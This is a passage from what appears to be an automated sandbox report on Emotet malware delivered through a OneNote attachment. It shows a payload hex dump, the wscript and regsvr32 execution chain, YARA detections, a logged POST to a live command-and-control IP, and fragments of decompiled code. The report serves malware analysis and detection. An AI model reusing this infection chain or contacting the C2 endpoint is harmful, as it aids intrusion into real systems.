                                                                                                                                                                                                          Data Ascii: <V4!Q@3bd!f5zn_7D\@g9?AC:|<Y-3B4#va@$gsPnr4{<hTR<i3.%5zcS(64%|5t=#f$=X`EjzS<`j J1IRSh;bk$kv8&'18?4S5t=h0?e`mxw?+/RvIJI5W&kbkk$E(
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC208INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2023-03-17 08:23:18 UTC208INData Raw: 34 30 30 30 0d 0a e3 a0 f4 22 40 43 35 fd f4 38 3d 59 3c 20 bd 24 2d 1a 34 48 7b eb ee 98 61 64 35 bd d6 66 44 37 44 5d 67 6b 65 b8 8a 6b 70 62 41 34 3b 1c 3a b9 91 19 3d 68 30 23 90 ef 74 49 33 62 66 81 ec 24 34 7a 53 93 a8 c0 f2 d2 9d 2b 64 39 3f ba 8e 95 f7 c8 b0 34 70 78 3c d0 b9 28 31 21 51 0a b9 4d b3 79 94 ff 29 ed b0 7a 52 26 45 7f c9 56 1e af 9a c6 77 a2 35 46 21 84 b0 34 70 78 3c 14 0a 68 30 e0 fc 02 35 48 33 6f e8 b5 21 65 35 7a 36 ad c0 77 45 53 28 e2 e0 79 3e 2b 71 a5 c4 03 34 74 71 0e 94 59 3c e9 bd 61 50 42 34 8f 77 2a 53 c1 c4 24 34 7a 53 29 c4 82 04 52 28 6b 01 b9 44 5d fa e7 01 42 35 74 f8 fd 7c 58 3c 68 78 ac 54 b3 2f 49 33 2a e2 45 31 2c b8 7f 65 31 45 37 0c da 6d 83 2d b4 3a cc 00 62 41 0b bc 31 f9 30 b1 5c 5c 86 cf de 19 cb 70 6c 73
                                                                                                                                                                                                          Data Ascii: 4000"@C58=Y< $-4H{ad5fD7D]gkekpbA4;:=h0#tI3bf$4zS+d9?4px<(1!QMy)zR&EVw5F!4px<h05H3o!e5z6wES(y>+q4tqY<aPB4w*S$4zS)R(kD]B5t|X<hxT/I3*E1,e1E7m-:bA10\\pls


Session ID:1
Source IP:192.168.2.4
Source Port:49700
Destination IP:182.162.143.56
Destination Port:443
Process:C:\Windows\System32\regsvr32.exe

Timestamp:2023-03-17 08:24:12 UTC
kBytes transferred:310
Direction:OUT
Data:
POST /xqnhpb/ HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: 182.162.143.56

Timestamp:2023-03-17 08:24:13 UTC
kBytes transferred:310
Direction:IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 17 Mar 2023 08:23:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp:2023-03-17 08:24:13 UTC
kBytes transferred:310
Direction:IN
Data:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:09:22:49
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\iMedPub_LTD_6.one
                                                                                                                                                                                                          Imagebase:0xb90000
                                                                                                                                                                                                          File size:1676072 bytes
                                                                                                                                                                                                          MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                          Start time:09:23:14
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                                                                                                                                                                                                          Imagebase:0xdc0000
                                                                                                                                                                                                          File size:147456 bytes
                                                                                                                                                                                                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                          Start time:09:23:19
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll
                                                                                                                                                                                                          Imagebase:0x8c0000
                                                                                                                                                                                                          File size:20992 bytes
                                                                                                                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                          Start time:09:23:19
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline: "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll"
                                                                                                                                                                                                          Imagebase:0x7ff73b770000
                                                                                                                                                                                                          File size:24064 bytes
                                                                                                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.382454189.0000000001290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                          Start time:09:23:22
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JURwocL\wAXwf.dll"
                                                                                                                                                                                                          Imagebase:0x7ff73b770000
                                                                                                                                                                                                          File size:24064 bytes
                                                                                                                                                                                                          MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.884606012.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.885272914.0000000002521000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                          Start time:09:23:29
                                                                                                                                                                                                          Start date:17/03/2023
                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:/tsr
                                                                                                                                                                                                          Imagebase:0xad0000
                                                                                                                                                                                                          File size:157872 bytes
                                                                                                                                                                                                          MD5 hash:DBCFA6F25577339B877D2305CAD3DEC3
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language


                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:8.7%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:7.4%
                                                                                                                                                                                                            Signature Coverage:5.9%
                                                                                                                                                                                                            Total number of Nodes:338
                                                                                                                                                                                                            Total number of Limit Nodes:9

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382242216.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ed0000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                                                                            • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                                                                                                                            • API String ID: 394283112-3605381585
                                                                                                                                                                                                            • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                            • Instruction ID: 36cd00cb8e3bc192fcd0e666ed444ea9c955e82ad11a06419bb7688c792a3f41
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A52F330618B488BC719DF18D8857BAB7E1FB94304F18562EE89BD7351DB34E942CB86
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
                                                                                                                                                                                                            • API String ID: 0-383957222
                                                                                                                                                                                                            • Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                                                                                                                            • Instruction ID: 489ffb11aab2cce4f1690b29e18dba401bcbd1025df2be3320e691303e37b4f8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7C1CC71519780AFD388DF28C58A91BBBF1FBD4754F906A1DF886862A0D7B4D909CF02
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                                                                                                                            • String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
                                                                                                                                                                                                            • API String ID: 2485490239-3005932707
                                                                                                                                                                                                            • Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                                                                                                                            • Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 260 28e7d6c-28e7d9a 261 28e7d9c-28e7da4 260->261 262 28e804a-28e80a9 call 28fa474 261->262 263 28e7daa-28e7dad 261->263 273 28e80ab-28e80b0 262->273 274 28e80b5 262->274 265 28e7ff4-28e8045 call 28f6048 263->265 266 28e7db3-28e7db9 263->266 265->261 269 28e7dbf-28e7dc5 266->269 270 28e7f53-28e7fef call 28ffdcc 266->270 275 28e80ba-28e80c0 269->275 276 28e7dcb-28e7ec1 call 28fbb78 269->276 270->261 273->261 274->275 279 28e80c6 275->279 280 28e7f40-28e7f52 275->280 281 28e7ec6-28e7ecc 276->281 279->261 282 28e7ece-28e7ed5 281->282 283 28e7edf-28e7f3b call 28f8f30 281->283 282->283 283->280
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: )s$)y_$3`d!$GX$lo$=
                                                                                                                                                                                                            • API String ID: 0-308291206
                                                                                                                                                                                                            • Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                                                                                                                            • Instruction ID: 866cd51dfd9310ef550721f5d96af8008e3c892837d1e855febeed4893c43a77
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A91477550074A8BDF48CF28C88A4DE3FA1FB58398F65422CEC4AA6290D778D695CFC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 285 28fa000-28fa0cc call 28f9f38 call 28f2404 290 28fa22c-28fa243 285->290 291 28fa0d2-28fa16a call 28f9424 285->291 293 28fa16f-28fa227 call 28fc2c0 291->293 293->290
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: /Q$;$F8$KT$F$Z
                                                                                                                                                                                                            • API String ID: 0-1951868783
                                                                                                                                                                                                            • Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                                                                                                                            • Instruction ID: 18f2e77c5065b32fba61b2f142f821c91e4e28e29da5af853b41f9175e0044b6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF6156B0E107098FCB48CFA8D88A8DEBBB1FB58314F10821DE846A7290D7749995CFD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                            			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                                                                                                                            				long long _v32;
                                                                                                                                                                                                            				long long _v40;
                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                            				intOrPtr _t15;
                                                                                                                                                                                                            				long long _t19;
                                                                                                                                                                                                            				long long _t20;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_a24 = _t20;
                                                                                                                                                                                                            				_a16 = _t15;
                                                                                                                                                                                                            				_a8 = _t19;
                                                                                                                                                                                                            				_v56 = _a16;
                                                                                                                                                                                                            				if (_v56 == 1) goto 0x80010ae6;
                                                                                                                                                                                                            				goto 0x80010bf4;
                                                                                                                                                                                                            				 *0x80022ca0 = _a8;
                                                                                                                                                                                                            				_v52 = 0x904;
                                                                                                                                                                                                            				_v48 = 0xf9e;
                                                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                            				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
                                                                                                                                                                                                            				ExitProcess(??);
                                                                                                                                                                                                            			}












                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                                                                                                                            • Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 0c$\$c2&
                                                                                                                                                                                                            • API String ID: 0-1001447681
                                                                                                                                                                                                            • Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                                                                                                                            • Instruction ID: 7db8eb9707bc1cc24b4299e4b74f4ce1ecbcdd735324f442ebcfb2c1e44d3687
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5702F7755083C88BEBBECF64C8896DE7BADFB44708F10511DEA0A9E298DB745744CB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .f$M$N5
                                                                                                                                                                                                            • API String ID: 0-1477915503
                                                                                                                                                                                                            • Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                                                                                                                            • Instruction ID: f1fde3c7aefe25725c99856c336007e5099ca130310444da9653b4a6b3368c56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAA15E741197449FDBA8DF28C4C959EBBE1FB84304F905A1DF88ADB2A0CB74D945CB42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: A]jN
                                                                                                                                                                                                            • API String ID: 0-1761522205
                                                                                                                                                                                                            • Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                                                                                                                            • Instruction ID: 7b7d16fe9b4abde8c094d15995ea42182cc0cc41a812a2965f1e339de3a04fb9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1D1E5B5D0060A8FDF48DFA8C48A4AEBBB1FB54304F11422DD516B7290D7785A46CFD1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: C
                                                                                                                                                                                                            • API String ID: 0-3705061908
                                                                                                                                                                                                            • Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                                                                                                                            • Instruction ID: 36e3af92f2ae1fb53de0e7b42cf624e67ff309aeeb8522e98a080b7d7afbaa20
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9961CF7551C7848BD768DF28C18940FBBF1FBD6748F000A1DE69A862A0D7B6D958CF42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                            			E0000000118000147C(void* __edx) {
                                                                                                                                                                                                            				void* _t5;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t5 = __edx;
                                                                                                                                                                                                            				if (_t5 == 0) goto 0x800014bd;
                                                                                                                                                                                                            				if (_t5 == 0) goto 0x800014b1;
                                                                                                                                                                                                            				if (_t5 == 0) goto 0x800014a4;
                                                                                                                                                                                                            				if (__edx == 1) goto 0x8000149d;
                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                            			}





                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                                                                            • Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                                                                                                                            • Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                                            			E000000011800063CC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                                                                                                                                                                                                            				long long _v56;
                                                                                                                                                                                                            				void* __rdi;
                                                                                                                                                                                                            				void* __rsi;
                                                                                                                                                                                                            				void* __rbp;
                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                            				long long _t73;
                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                            				long long _t89;
                                                                                                                                                                                                            				signed int _t90;
                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                            				intOrPtr* _t92;
                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                            
                                                                                                                                                                                                            				_t98 = __r8;
                                                                                                                                                                                                            				_t75 = __rcx;
                                                                                                                                                                                                            				_a8 = __rbx;
                                                                                                                                                                                                            				r14d = __ecx;
                                                                                                                                                                                                            				if (__ecx == 0) goto 0x8000653f;
                                                                                                                                                                                                            				_t2 = _t75 - 1; // -1
                                                                                                                                                                                                            				if (_t2 - 1 <= 0) goto 0x8000640a;
                                                                                                                                                                                                            				E000000011800086F4(_t2 - 1, __rax);
                                                                                                                                                                                                            				_t3 = _t90 + 0x16; // 0x16
                                                                                                                                                                                                            				 *__rax = _t3;
                                                                                                                                                                                                            				E000000011800085B8();
                                                                                                                                                                                                            				goto 0x8000653f;
                                                                                                                                                                                                            				E00000001180009CD8(_t50, __rbx, _t91);
